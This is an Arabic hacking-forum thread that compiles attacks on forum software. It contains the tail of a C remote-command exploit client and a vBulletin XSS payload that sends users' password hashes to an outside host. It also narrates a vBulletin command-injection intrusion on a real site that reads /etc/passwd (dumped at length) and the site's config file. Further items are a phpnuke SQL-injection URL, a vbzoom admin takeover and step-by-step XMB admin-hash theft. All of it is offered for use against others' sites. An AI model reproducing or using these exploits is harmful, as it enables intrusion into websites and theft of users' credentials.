if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}

if ( (he = gethostbyname(host)) == NULL)
{
perror("gethostbyname()");
exit(1);
}
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr = *( (struct in_addr *)he->h_addr);
addr.sin_port = htons(port);

bzero(&action, sizeof(action));
action.sa_handler = (void *)time_out;
action.sa_flags = 0;
sigaction(SIGALRM, &action, 0);

alarm(timeout);
if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
{
perror("connect()");
exit(1);
}
alarm(0);
printf("\\q to exit cmd prompt\n");
while(1)
{
printf("cmd> ");
fgets(cmd_buf, sizeof(cmd_buf), stdin);
for (x = 0; x < strlen(cmd_buf); x++)
if (cmd_buf[x] == '\n')
cmd_buf[x] = '\0';

if ( (cmd_buf[0] == '' && cmd_buf[1] == 'q') )
exit(0);


for (x = 0; x < strlen(cmd_buf); x++)
{
tmp[0] = cmd_buf[x];
/* 0 - 9 */
if ( (cmd_buf[x] >= 0 && cmd_buf[x] <= 9) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* A - Z */
else if ( (cmd_buf[x] >= 65 && cmd_buf[x] <= 90) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* a - z */
else if ( (cmd_buf[x] >= 97 && cmd_buf[x] <= 122) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* everything not a letter or number */
else
{
snprintf(tmp2, sizeof(tmp2), "%c%X", sign, cmd_buf[x]);
strncat(encoded_cmd, tmp2, sizeof(encoded_cmd));
}
}
/* use HTTP/1.1 in order to send valid HTTP commands to virtual hosts */
snprintf(data, sizeof(data), "GET %s%s%s%s%s%s HTTP/1.1\nHost: %s\n\n", path, url1,
date, url2, encoded_cmd, url3, host);
/* be verbose about the string we're sending in case we need to debug. */
if (verbose == 1)
printf("\nSending: %s", data);

send(sockfd, data, sizeof(data), 0);

if ( (f = fdopen(sockfd, "r+") ) == NULL)
{
perror("fdopen()");
exit(1);
}
while(1)
{
fgets(output, sizeof(output), f);
if (feof(f) != 0)
break;
else
printf("%s", output);
memset(&output, '\0', sizeof(output));
}

memset(&cmd_buf, '\0', sizeof(cmd_buf));
memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
memset(&data, '\0', sizeof(data));
memset(&output, '\0', sizeof(output));

fclose(f);

if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}
alarm(timeout);
if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
{
perror("connect()");
exit(1);
}
alarm(0);
}
return 0;
}
-----------------------------------

منقول من موقع أمريكي يالي بدو يترجو يحط ترجمتوا بالموضوع هذا
______________________________
ثغرة vBulletin


quote:
--------------------------------------------------------------------------------
Originally posted by MAKS:
Within the first few lines of code in memberlist.php, the variable
$letterbits is evaluated. Because of the way PHP initializes variables,
we can inject HTML or JavaXXXXXX into the XXXXXXXX. So by directing a
user to, for example:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%


2Ephp%3Fcook%3D%27%2B
escape%28XXXXXXXX%2EXXXXXXXXXXXX%29%3C%2FXXXXXX%3E
(NOTE: The URL should be on a one line)

You can steal the user's password hash and user id. Because of the way
vBulletin parses URLs, the above will not function inside the forum, but
if we put this in an off-site html file:

XXXXXXXX = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3CXXXXXX%3EXXXXXXXX%3D
%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco


rd%2Ephp%3Fcook%3D%27
%2Bescape%28XXXXXXXX%2EXXXXXXXXXXXX%29%3C%2FXXXXXX%3E"

And then link to it instead, the exploit will work as intended. The user
doesn't even have to be aware of what has transpired, the above link
will proceed first to the memberlist w/XXXXXXXXXXXX stealing code, and
then to [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

With the recorded user id and password hash, we can access the site:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] hash]
-----------------------------------------------------------------------------------

منقول من موقع امركي
--------------------------------------------------------------------------------




ثغرة في منتديات vbulletin 2.0.3

بسم الله الرحمن الرحيم



الثغرة وظيفتها ببساطة انها تسمحلك تنفذ اوامر على الجهاز زي البي اتش بي شيل

فرحنا انا و صاحبي لاعز صديق للهكر الاخ قوقل و قلناله جبلنا مواقع شغالة على

vbulletin 2.0.3

طبعا ما قصر قوقل و جبلنا لسته فاخترنا وحدة منهم و كان الموقع هو

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] <بعرف اني حاندم على اني حطيت الموقع بس يللا مو مشكلة>

و طبقنا الثغرة ظهر الشكل

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]%20`;die ( );echo"

و مكان نحط الامر الي بدنا ياه

فاول شي قلنا خلينا نعرف مين نحنا فحطينا

whoami

و الي طلع


انا استبشرت خير على الاقل مني nobody

فقلت خليني اخد نظرة على ملف الباسوورد و اشوف المواقع على السيرفر فحطيت

cat /etc/passwd مكان

و طلع

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x0ync:/sbin:/bin/sync
shutdown:x:6:0hutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0perator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
gtd:x:501:100::/home/gtd:/bin/bash
majordomo:x:504:103::/home/majordomo:/bin/bash
quota25:*:505:1::/home/quota25:
quota50:*:506:1::/home/quota50:
quota75:*:507:1::/home/quota75:
quota100:*:508:1::/home/quota100:
quota150:*:509:1::/home/quota150:
quota300:*:510:1::/home/quota300:
quota2:*:511:1::/home/quota2:
quota5:*:512:1::/home/quota5:
quota10:*:513:1::/home/quota10:
msql:x:497:100::/home/msql:/bin/bash
userquota:x:503:100:quota:/home/userquota:/bin/bash
johnv:*:516:1::/home/johnv:
minerva:x:514:516::/home/minerva:/bin/bash
taosfineart:x:517:517::/home/taosfineart:/bin/bash
technoasylum:x:518:518::/home/technoasylum:/bin/bash
ward-tech:x:519:519::/home/ward-tech:/bin/bash
malio:x:522:522::/home/malio:/bin/bash
cindyland:x:529:529::/home/cindyland:/bin/bash
mathom-house:x:532:532::/home/mathom-house:/bin/bash
libertyXXXhosting:x:534:534::/home/libertyXXXhosting:/bin/bash
bonfiglioreed:x:537:537::/home/bonfiglioreed:/bin/bash
oldtymespizza:x:539:539::/home/oldtymespizza:/bin/bash
dogshowjournal:x:546:545::/home/dogshowjournal:/bin/bash
surfclassic:x:550:549::/home/surfclassic:/bin/bash
thomason-development:x:552:551::/home/thomason-development:/bin/bash
james:x:553:534::/home/james:/bin/emailonly
alexr:x:554:534::/home/alexr:/bin/emailonly
god:x:555:522::/home/god:/bin/emailonly
sales:x:556:522::/home/sales:/bin/bash
info:x:557:522::/home/info:/bin/emailonly
ryugen:x:558:552::/home/ryugen:/bin/bash
allanart:x:566:559::/home/allanart:/bin/bash
womensphotoworks:x:573:564::/home/womensphotoworks:/bin/bash
mbaentry:x:576:567::/home/mbaentry:/bin/bash
omahasoaring:x:577:568::/home/omahasoaring:/bin/bash
talvee:x:582:549::/home/talvee:/bin/emailonly
mobilewashenvironmental:x:585:572::/home/mobilewashenvironmental:/bin/bash
mobilewashservices:x:589:576::/home/mobilewashservices:/bin/bash
ocdeaf:x:591:578::/home/ocdeaf:/bin/bash
foxfire-goldens:x:592:579::/home/foxfire-goldens:/bin/bash
finchair:x:594:580::/home/finchair:/bin/bash
americanabatement:x:595:581::/home/americanabatement:/bin/bash
whiskersgraphics:x:596:582::/home/whiskersgraphics:/bin/bash
ronemous:x:604:568::/home/ronemous:/bin/emailonly
parrotranch:x:605:588::/home/parrotranch:/bin/bash
erlefamily:x:606:589::/home/erlefamily:/bin/ftponly
parduhn:x:610:593::/home/parduhn:/bin/bash
riptideproductions:x:616:596::/home/riptideproductions:/bin/bash
kaialece:x:626:604::/home/kaialece:/bin/bash
zeeksystems:x:627:605::/home/zeeksystems:/bin/bash
trevor:x:630:596::/home/trevor:/bin/emailonly
dino:x:631:522::/home/dino:/bin/emailonly
loconsigo:x:632:608::/home/loconsigo:/bin/bash
delamerevineyard:x:643:613::/home/delamerevineyard:/bin/bash
michael:x:652:605::/home/michael:/bin/emailonly
jereme:x:654:596::/home/jereme:/bin/emailonly
windows-tips:x:655:624::/home/windows-tips:/bin/bash
ghost-ride:x:657:626::/home/ghost-ride:/bin/bash
cprltd:x:663:629::/home/cprltd:/bin/bash
batmanandbarbie:x:673:636::/home/batmanandbarbie:/bin/bash
housegroove:x:674:637::/home/housegroove:/bin/bash
washglass:x:675:638::/home/washglass:/bin/bash
djmattson:x:676:639::/home/djmattson:/bin/bash
statecapitols:x:677:640::/home/statecapitols:/bin/bash
kanjiXXX:x:678:641::/home/kanjiXXX:/bin/bash
freevg:x:681:644::/home/freevg:/bin/bash
writersresource:x:682:645::/home/writersresource:/bin/bash
evilgraphics:x:684:647::/home/evilgraphics:/bin/bash
magdalenhsuli:x:690:650::/home/magdalenhsuli:/bin/bash
antioch:x:704:659::/home/antioch:/bin/bash
lifelinks:x:705:660::/home/lifelinks:/bin/bash
sinecos:x:707:662::/home/sinecos:/bin/bash
dosdonas:x:711:666::/home/dosdonas:/bin/bash
accuratelegalprocessingse:x:713:668::/home/accuratelegalprocessingse:/bin/bash
jc:x:716:581::/home/jc:/bin/emailonly
jo:x:717:581::/home/jo:/bin/emailonly
infoaai:x:719:581::/home/infoaai:/bin/emailonly
gypsytejas:x:721:671::/home/gypsytejas:/bin/bash
j-j-c:x:724:674::/home/j-j-c:/bin/bash
camp:x:726:660::/home/camp:/bin/emailonly
marinabaypark:x:740:677::/home/marinabaypark:/bin/bash
gypsy:x:741:671::/home/gypsy:/bin/emailonly
meg:x:749:593::/home/meg:/bin/emailonly
huwe:x:751:679::/home/huwe:/bin/bash
ultimateautomotive50:x:753:681::/home/ultimateautomotive50:/bin/bash
socceracademypa:x:755:683::/home/socceracademypa:/bin/bash
phoenixfamilymuseum:x:761:689::/home/phoenixfamilymuseum:/bin/bash
videoteacher:x:762:690::/home/videoteacher:/bin/bash
spiffydesign:x:765:693::/home/spiffydesign:/bin/bash
nawaf:x:766:694::/home/nawaf:/bin/bash
ccdump:x:768:696::/home/ccdump:/bin/bash
drwizard-atlanta:x:772:700::/home/drwizard-atlanta:/bin/bash
showme-powerchutes:x:777:705::/home/showme-powerchutes:/bin/bash
XXXXlmandanceacademy:x:778:706::/home/XXXXlmandanceacademy:/bin/bash
samelec:x:779:707::/home/samelec:/bin/bash
pet-odor:x:780:708::/home/pet-odor:/bin/bash
michael1:x:781:593::/home/michael1:/bin/emailonly
mmnursereview:x:785:710::/home/mmnursereview:/bin/bash
franksland:x:787:712::/home/franksland:/bin/bash
gr8gifts4u:x:801:717::/home/gr8gifts4u:/bin/bash
globalintercultural:x:806:718::/home/globalintercultural:/bin/bash
gotcher-belote:x:807:719::/home/gotcher-belote:/bin/bash
francisengineering:x:808:720::/home/francisengineering:/bin/bash
befree2:x:814:726::/home/befree2:/bin/bash
barclay:x:821:689::/home/barclay:/bin/emailonly
airupdate:x:823:732::/home/airupdate:/bin/bash
stream:x:825:734::/home/stream:/bin/bash
strantech:x:826:735::/home/strantech:/bin/bash
newcityftp:x:832:740::/home/newcityftp:/bin/bash
nagomifan:x:833:741::/home/nagomifan:/bin/bash
gecko:x:834:671::/home/gecko:/bin/emailonly
chooseyourlife:x:838:745::/home/chooseyourlife:/bin/bash
binarytech:x:839:746::/home/binarytech:/bin/bash
<<<طبعا ملف الباس كله طويل لكن حطيته جزء منه مشان تشوفوه>>>>

ممم سيرفر جيد و حطيت نسخة عنه في مكتبة ملفات الباسوورد عندي للذكرى المهم نشوف الموقع اشو حكايته

romulus2:x:997:837::/home/romulus2:/bin/bash
اووووه حركات يوصل ل /bin/bash

االمهم فكرت كيف حناخد الباسوورد حق هدا الموقع
صاحبي قلي شوف الشادو قلتلو لا تتعب نفسك الشادو هذي الايام مخفي ايام زماااااااااااااااان

فقلت خلص نشوف الكونفيق و ان شاء الله يكون صاحب الموقع غبي و حط نفس الباس

من ملف الباسوود لاحظت انه الملف هو

/home/romulus2

و في طريقة تانية انك تكتب pwd

كتبت و طلع

/home2/www/romulus2/forum

اذا هذا هو مكان ملفات الموقع الصحيحة و اضفت لها

/admin/config.php

فصار الامر

cat /home2/www/romulus2/forum/admin/config.php
_________________
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

__________________________________________________
__
-----------------------------------------------------------------------------------
ثغرة مجلة phpnuke

ثغرة مجلة phpnuke


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] 20OUTFILE%20'[/path]/vf.txt'/*



تضع بدلا من[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] أسم الموقع الذي تريده




منقووول

____________________________________
اختراق منتديات vbzoom
------------------------------------------------
السلام عليكم
شباب انا اقدم لكم اهم ثغره معى الشرح المفصل


User Name:

Password:

Email:








User Name:

Password:

Email:




وبعد ان تحط وصل الموقع
تسويه في صفحه html
وتكتب اسم الادمين والباسورد الجديده وايميل جديد
تحياتي
_________________


ثغرة في منتديات من نوع XMB
--------------------------------------------------------
بسم الله الرحمن الرحيم
طريقة الاختراق :

ثغرة [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] في منتديات من نوع XMB

الشرح والتطبيق

1- عليك بالذهاب الى موقع جوجل [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
2- اكتب في منطقة البحث XMB 1.6 Magic Lantern Final
3- سوف ترى منتديات كثييييييييره اكثرها مصابه بهذه الثغره لكن رجاااء
لاتقرب [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] العربية وعليك بتحذيرها من الثغره الموجوده.
4- اضغط على اي منتدى وقم بكتابة الكلمة التالية بعد عنوان المنتدى
index_log.log يعني راح يكون زي كده
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
5- راح ينزل عندك ملف والملف عباره عن ملف زي الكوكيز كبير وفيه اسماء
المستخدمين والباسورد وأشياء ثانيه ماتهمنا.
6- الأن عليك بالبحث في المنتدى عن اسم المدير وذلك بالذهاب الى المواضيع
وتشوف الأسماء والي تلقى تحت اسمه ادمن ستريتور انسخ اسمه.
7- افتح الملف الي نزلته من الموقع وسوي بحث عن اسم المدير راح يجيك هيك مثلا:
xmbuser=admin
والباسورد راح تلقاه قدامه زي كذه
xmbpw=1faeb6747a31c854800ddf3c62b1717a
8- طبعا الباسورد في هذه الحاله مشفر وفك التشفير صعب لهذا الغرض قامت شركة
CCI بتصميم برنامج يقوم بهذا الغرض وهذه وصلت البرنامج
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


افتح البرنامج وفي :


رقم (1) قم بوضع علامة صح.
رقم (2) قم بوضع اسم العضو سواء مدير او غيره
رقم (3) قم بوضع الباسورد المشفر حق العضو او المدير او غيره
رقم (4) قم بوضع علامة صح.
رقم (5) قم بوضع XXXXXXXXXXXXXXXX الي تريده اوXXXXXXXXXXXXXXXX حق مزوده الخدمه حقك
رقم (6) قم بوضع المنفذ حق XXXXXXXXXXXXXXXX

10- بقي شيء واحد بعد اتمام الأعدادات حقت البرنامج بقي ان تذهب الى
المتصفح انترنت اكسبلورر > اضغط بالزر اليمين> الأتصالاات> اعدادات>
قم بوضع XXXXXXXXXXXXXXXX هذا 127.0.0.1> والمنفذ 8080
11- بعد ذلك اذهب للمنتدى المستهدف وتجول فيه وكأنك المدير تبع المنتدى
وسوي الي بدك ياه
ها ها ها ها

أرجو أن ينال هذا الدرس إعجابكم
هذا الدرس هام جدا جدا جدا [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] بجميع مستوياتهم
والسلام عليكم ورحمة الله وبركاته


منقول للفائدة













-------------------------------------------------------------------------------------------------{توقــــــيع}------------------------------------------------------------------------------- --------------
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://www.serajy.yoo7.com
 
جميع طرق إختراق المنتديات لكل الهاكرز بكافة المستويات + ثغرات جديدة
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
ஹ منتديات شعلة الإسلام ஹ  :: ঔღঔالــمــنــتــديــاتــ الـتــقــنـيــة ঔღঔ :: ஹ«الـــــهــــكــــر والــــحـــمـــــآيـــــــــه»ஹ-
انتقل الى: